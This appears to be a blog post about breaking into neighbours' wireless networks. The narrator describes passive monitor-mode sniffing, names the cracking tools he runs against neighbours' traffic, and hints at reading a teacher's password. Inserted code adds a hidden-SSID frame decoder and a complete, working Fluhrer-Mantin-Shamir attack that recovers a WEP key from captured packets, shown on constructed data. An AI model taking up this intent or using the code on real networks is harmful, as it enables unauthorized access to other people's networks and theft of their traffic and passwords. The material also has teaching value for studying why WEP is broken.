Well, my internet is busted. Specifically, I think the WiFi access point of the guy I sublet from is defunct. So, to while away my internetless hours I've been learning how to get into my neighbors' networks. The process is pretty simple. A little bit of terminology first:
If you are familiar with wired Ethernet sniffing, you know the term promiscuous mode. A shared Ethernet segment (a hub or coax, not a switch, which only forwards a frame to the port it is addressed to) is like a room full of people all shouting at the same time, and your computer just ignores anything not specifically destined for it. When you go into promiscuous mode you start listening to everything happening on the line. If people are sending passwords and whatnot without using encryption, you can just read them out of the traffic. (So I've heard. I'd certainly not know if any of my English teachers back in college had the password "60retire".)
Well, a wireless card has a promiscuous mode as well. It isn't what you want, though. Promiscuous mode only gives you the traffic of the network you are associated with, the one whose access point you are using, and hands it to you as ordinary Ethernet frames. What is interesting in this situation is all the computers that are transmitting but which aren't on your network. To get those packets you need monitor mode, which passes up every raw 802.11 frame the radio hears on its channel (beacons, probes, management and data frames, from any network) whether or not you are associated with anything.
The 802.11 protocol also allows for active scanning: a card sends out probe requests, and an access point that broadcasts its SSID answers with a probe response. NetStumbler uses this method to detect networks. It is mostly useful in wardriving, where you want an answer immediately rather than parking on each channel and waiting for a beacon. Since I'm sitting in one place, I don't really need that. Monitor mode has two further advantages: it is passive (the card transmits nothing, so there is nothing for anyone to notice), and some access points don't put their SSID in beacons at all, yet a card in monitor mode still sees those beacons, plus the probe requests and responses in which clients and the AP exchange the hidden name.
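To make concrete what monitor mode actually hands you, here is a small decoder for the three management frames discussed above (beacons, probe requests, probe responses), the way a passive scanner such as Kismet would sort them. This is an added example, not code from the original post, Kismet or NetStumbler. The frames are constructed inline (bare 802.11 headers, no radiotap header or FCS) and the MAC addresses and SSIDs in them are made up; the hidden network's name is blank in its beacon and only turns up in the probe exchange.

```python
"""Decode 802.11 management frames as seen from a monitor-mode capture.

Added example (not from the original post or any tool it mentions).
Sample frames below are constructed; addresses and SSIDs are invented.
"""
import struct

SUBTYPE = {4: "probe-req", 5: "probe-resp", 8: "beacon"}
TAG_SSID, TAG_DS_PARAMS = 0, 3   # tagged-parameter IDs: SSID, channel
CAP_ESS, CAP_PRIVACY = 0x0001, 0x0010   # capability bits: infrastructure, WEP/WPA on


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_tags(data):
    """Tagged parameters are (id, length, value) triplets up to the end of the frame."""
    tags = {}
    while len(data) >= 2:
        tag_id, length = data[0], data[1]
        if len(data) < 2 + length:
            break   # truncated element: stop rather than read past the frame
        tags[tag_id] = data[2:2 + length]
        data = data[2 + length:]
    return tags


def parse_mgmt_frame(frame):
    """Return a dict for a beacon / probe request / probe response, else None."""
    if len(frame) < 24:
        return None
    fc, _duration = struct.unpack_from("<HH", frame, 0)
    ftype, subtype = (fc >> 2) & 3, (fc >> 4) & 0xF   # type 0 = management
    if ftype != 0 or subtype not in SUBTYPE:
        return None
    info = {"subtype": SUBTYPE[subtype], "da": mac(frame[4:10]),
            "sa": mac(frame[10:16]), "bssid": mac(frame[16:22])}
    body = frame[24:]   # header ends after the 2-byte sequence control
    if subtype in (5, 8):   # beacon / probe response carry 12 bytes of fixed fields
        if len(body) < 12:
            return None
        _timestamp, interval, cap = struct.unpack_from("<QHH", body, 0)
        info["beacon_interval_tu"] = interval
        info["privacy"] = bool(cap & CAP_PRIVACY)
        body = body[12:]
    tags = parse_tags(body)
    ssid = tags.get(TAG_SSID, b"")
    # A "non-broadcast" AP beacons with an empty or all-NUL SSID element.
    info["hidden"] = subtype == 8 and (len(ssid) == 0 or set(ssid) == {0})
    info["ssid"] = "" if info["hidden"] else ssid.decode("utf-8", "replace")
    if tags.get(TAG_DS_PARAMS):
        info["channel"] = tags[TAG_DS_PARAMS][0]
    return info


def networks(frames):
    """Merge beacons and probe responses per BSSID like a passive scanner does:
    a hidden beacon leaves the name blank until a probe response reveals it."""
    nets = {}
    for f in frames:
        p = parse_mgmt_frame(f)
        if p is None or p["subtype"] not in ("beacon", "probe-resp"):
            continue
        n = nets.setdefault(p["bssid"], {"ssid": "", "channel": None,
                                         "privacy": None, "hidden": False})
        if p["ssid"]:
            n["ssid"] = p["ssid"]
        n["hidden"] = n["hidden"] or p["hidden"]
        n["channel"] = p.get("channel", n["channel"])
        n["privacy"] = p["privacy"]
    return nets


def build_frame(subtype, da, sa, bssid, ssid, channel=None, privacy=False):
    """Constructed sample frame: 24-byte header, fixed fields if needed, tags."""
    fc = subtype << 4   # management type, no flags
    hdr = struct.pack("<HH", fc, 0) + da + sa + bssid + struct.pack("<H", 0)
    body = b""
    if subtype in (5, 8):
        cap = CAP_ESS | (CAP_PRIVACY if privacy else 0)
        body += struct.pack("<QHH", 0x1122334455, 100, cap)
    body += bytes([TAG_SSID, len(ssid)]) + ssid
    if channel is not None:
        body += bytes([TAG_DS_PARAMS, 1, channel])
    return hdr + body


BROADCAST = b"\xff" * 6
AP1, AP2 = bytes.fromhex("00095b112233"), bytes.fromhex("000c41aabbcc")   # invented
CLIENT = bytes.fromhex("000b6b445566")                                    # invented
SAMPLE_FRAMES = [
    build_frame(8, BROADCAST, AP1, AP1, b"linksys", channel=6, privacy=True),  # WEP beacon
    build_frame(8, BROADCAST, AP2, AP2, b"", channel=11, privacy=True),        # hidden SSID
    build_frame(4, BROADCAST, CLIENT, BROADCAST, b"hiddennet"),                # client probes
    build_frame(5, CLIENT, AP2, AP2, b"hiddennet", channel=11, privacy=True),  # AP answers
]

if __name__ == "__main__":
    for bssid, n in networks(SAMPLE_FRAMES).items():
        print(bssid, n)
```

Only beacons and probe responses are merged into the network list; the probe request is still worth logging on its own, since a client asking for a name by SSID tells you what hidden network it expects to find.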
My card is a 3Com 3CRDAG675 (an Atheros-based card) and I'm using the madwifi drivers, since support isn't built into the kernel. The drivers aren't supported by most of the sniffing programs, but all I have to do is put the card in monitor mode manually. This took me a while to figure out, so I'll note it here. Assuming that the card is already up and running, do:
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode mon
ifconfig ath0 up
Then I start up Kismet and leave it running. Unfortunately, none of my neighbors seem to be BitTorrent fans, so traffic has been coming in pretty slow. According to an excellent article on WEP cracking, I'm going to need about 2 GB of traffic. At my current rate, I ought to have that in about three months.
Because the analysis being done is statistical, different tools have different rates of success. Kismet dumps all its logs in /var/log/kismet, and I'm running AirSnort and Aircrack over them. From reading a comparison of WEP crackers, however, it really looks like WEPLab is the way to go.
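The "statistical" part is worth seeing once in code. WEP encrypts each packet with RC4 keyed by the 3-byte cleartext IV followed by the secret key, every data frame begins with a known byte (the 0xAA of the LLC/SNAP header), and for certain "weak" IVs the first keystream byte leaks a secret key byte about one time in twenty. A cracker tallies votes across many packets and takes the winner, which is why the tools differ in success rate (which IV classes they use, how they vote, how much they backtrack) and why so many packets are needed. The following is an added example of the original Fluhrer-Mantin-Shamir attack on a WEP-40 key, not code from the original post or from AirSnort, Aircrack or WEPLab. The capture is constructed locally with a made-up secret key and only the classic FMS IV class; the attacker side sees nothing but each packet's IV and first ciphertext byte, and uses a small branching factor (like aircrack's fudge factor) plus a known-plaintext check of the full candidate key to survive the noise.

```python
"""FMS weak-IV attack on a WEP-40 key, run against a constructed capture.

Added example; not code from the original post or the tools it names.
SECRET_KEY and the packet contents are invented for the demo.
"""
import random
from collections import Counter

SECRET_KEY = bytes.fromhex("0badc0ffee")   # constructed 5-byte (WEP-40) secret
SNAP_DSAP = 0xAA   # first plaintext byte of every 802.11 data frame body (LLC/SNAP)


def rc4_ksa(key):
    """RC4 key scheduling: the permutation S for the given key bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n RC4 output bytes (the PRGA) for key."""
    S = rc4_ksa(key)
    i = j = 0
    out = []
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret, iv, plaintext):
    """WEP per-packet encryption: RC4 keyed with IV || secret (ICV omitted here)."""
    ks = rc4_keystream(iv + secret, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


def weak_ivs(a):
    """The classic FMS IV class that attacks secret-key byte a: (a+3, 255, x)."""
    return [bytes([a + 3, 255, x]) for x in range(256)]


def fms_vote(iv, known_prefix, first_keystream_byte):
    """One vote for secret byte len(known_prefix), or None if this IV is not 'resolved'.

    The attacker replays the KSA for the bytes it knows (IV + recovered prefix).
    If S[1] + S[S[1]] lands on the position the unknown byte is about to be mixed
    into, then (about 5% of the time) the rest of the KSA leaves S[0], S[1] and
    S[a+3] alone, the first output byte equals S[j_next], and the swap inverts.
    """
    a = len(known_prefix)
    key = iv + known_prefix
    S = list(range(256))
    j = 0
    for i in range(a + 3):
        j = (j + S[i] + key[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] < a + 3 and (S[1] + S[S[1]]) & 0xFF == a + 3:
        return (S.index(first_keystream_byte) - j - S[a + 3]) & 0xFF
    return None


def vote_counts(packets, known_prefix):
    """Tally FMS votes over a capture given as (iv, first ciphertext byte) pairs."""
    counts = Counter()
    for iv, c0 in packets:
        guess = fms_vote(iv, known_prefix, c0 ^ SNAP_DSAP)
        if guess is not None:
            counts[guess] += 1
    return counts


def key_checks_out(candidate, packets, samples=8):
    """Known-plaintext check: the candidate must decrypt every sampled first byte to 0xAA."""
    return all(rc4_keystream(iv + candidate, 1)[0] ^ c0 == SNAP_DSAP
               for iv, c0 in packets[:samples])


def recover_key(packets, key_len=5, fudge=4, prefix=b""):
    """Depth-first search over the top-`fudge` vote winners per byte, verifying
    each full-length candidate. Returns the key bytes or None."""
    if len(prefix) == key_len:
        return prefix if key_checks_out(prefix, packets) else None
    for byte, _ in vote_counts(packets, prefix).most_common(fudge):
        found = recover_key(packets, key_len, fudge, prefix + bytes([byte]))
        if found is not None:
            return found
    return None


def build_capture(secret, seed=1):
    """Constructed capture: one packet per weak IV for each key byte; the attacker
    keeps only the cleartext IV and the first ciphertext byte of each."""
    rng = random.Random(seed)
    packets = []
    for a in range(len(secret)):
        for iv in weak_ivs(a):
            body = bytes([SNAP_DSAP]) + bytes(rng.randrange(256) for _ in range(15))
            packets.append((iv, wep_encrypt(secret, iv, body)[0]))
    return packets


if __name__ == "__main__":
    capture = build_capture(SECRET_KEY)
    print("votes for byte 0:", vote_counts(capture, b"").most_common(3))
    print("recovered:", recover_key(capture).hex(), "expected:", SECRET_KEY.hex())
```

A real capture contains every IV the access point happened to pick, so the cracker scans all of them with the resolved-state test rather than asking for a specific class; the 1280 packets here would be spread thinly across a real day's traffic, which is what makes the page's two-gigabyte estimate plausible.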